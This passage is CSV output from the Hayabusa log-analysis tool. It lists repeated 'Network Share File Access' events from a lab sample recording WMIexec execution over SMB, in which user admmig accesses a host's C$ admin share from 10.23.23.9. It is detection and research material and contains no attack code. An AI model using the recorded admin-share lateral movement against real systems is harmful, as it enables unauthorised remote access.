Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B22c61a69#\a9e1bbb2f77ddf73fdc37769da51597e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B46c55d17#\acca0c1913cd50d9cfb935bc3fdcb23d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.544 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B83e9cb53#\84fa86c4d86aa17ce68c75a1625383e0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.B3325a29b#\11e47175268433f2afe5bf68ea4899ae : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.575 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Baa2ca56b#\44884740e6e261405b0440efde616082 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Bfc9dc24d#\465ef4c9fe7c77ed5384c3c379fbe9b3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Build\a7bcc49edef862e86e95e8959d30ae67 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.607 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C8d726d22#\7a53b2a7d76ecfa30210cf5ead782971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C25dcfcb8#\02acbf854b27f2d83aa9eec6e1f6135a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.622 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.C26a36d2b#\69e2093b3cec29bdd3c9fbba83990dfe : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ca018eff0#\dd2dddd8e337402ac96330a8d24120d6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.CSharp\3df09428e1087ca282100efc481a9947 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.D0ff51f83#\93e744bcb19dc3206bfff080448a94e1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.638 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.654 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G46fcc235#\8b051a98022e8b354053e87e1dcaf2f0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.663 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.G91a07420#\88eec28a11e76fffbecf3de79cadf076 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.670 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ga41585c2#\d75626a8ff89596aee2cf2c9eb554cbf : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I0cd65b90#\62095b976d2affb993898b2e9f88c475 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.I7676db1a#\f39c57237f98d69b4abdc9e3907d8fe7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.686 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ib6702479#\9fd6e8c8110ccd01fd6745507b906c04 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.702 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ic1a2041b#\ec2e3c1e16b1d1427b32d2f2babf99bc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Ifcaec084#\a9175ff6a1a8784975c70e9933314ecd : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Kd58820a5#\c7ef2b5b5fc4335bef3148904cb3f0e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.M870d558a#\a5c640ad1645775e93d560f67f3ea1d1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Meefd589e#\865873dc1b8af370b7a314c3c89dcfd0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.717 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf5ac9168#\9d5a241e9cf3bdb8312058004ea269f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\68828aa1ea98316a22a4d8488267b07b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mff1be75b#\7cb1fc2895121ae7e24841bd0c24b25e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.733 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P0e11b656#\e1349161320cee221fb339c41ab73546 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:31.748 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f9a5e83#\59420f153f7bb0ef6f63e75d08020c8c : IP Address: 